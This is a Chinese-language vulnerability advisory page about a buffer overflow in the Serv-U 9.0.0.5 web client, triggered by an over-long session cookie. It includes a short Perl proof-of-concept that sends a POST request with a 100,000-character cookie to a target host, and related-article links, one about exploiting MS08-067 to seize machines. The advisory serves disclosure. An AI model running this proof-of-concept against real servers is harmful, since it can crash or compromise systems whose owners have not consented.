Serv-U Web客户端HTTP请求远程溢出漏洞
影响版本:
RhinoSoft Serv-U 9.0.0.5
漏洞描述:
BUGTRAQ ID: 36895
Serv-U FTP是一款FTP服务程序。
Serv-U产品捆绑有一个简单的基于浏览器的传输客户端,这个客户端在处理超长的会话Cookie时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意服务器并向WebClient HTTP服务返回了超长的会话Cookie,就可能触发这个溢出,导致在用户机器上执行任意指令。
---snip--- use IO::Socket; $|=1; $a = "A" x 100000; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '80', Proto => 'tcp'); print $sock "POST / HTTP/1.1rn" ."Host: $ARGV[0]rn" ."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$arn" ."Content-Type: multipart/form-data; boundary=---------------------------25249352331758rn" ."Content-Length: 0rnrn"; while (<$sock>) { print; } ---snip---
【编辑推荐】
- C'Nedra网络插件Read_TCP_String远程溢出漏洞
- 利用MS08067远程溢出漏洞抓肉鸡
- Alt-N MDaemon IMAP Server CREATE命令远程溢出漏洞
推荐阅读
瑞星杀毒软件不安全文件权限漏洞影响版本: Rising Antivirus 2009 (21.62.04) Rising Internet Security 2009 (21.62.04) Rising Personal Firewall 2009 (21.62.04)漏洞描述: BUGTRAQ ID: 36836 瑞星是中国的一家非>>>详细阅读
本文标题:Serv-U Web客户端HTTP请求远程溢出漏洞
地址:http://www.17bianji.com/anquan/buding/1481.html
1/2 1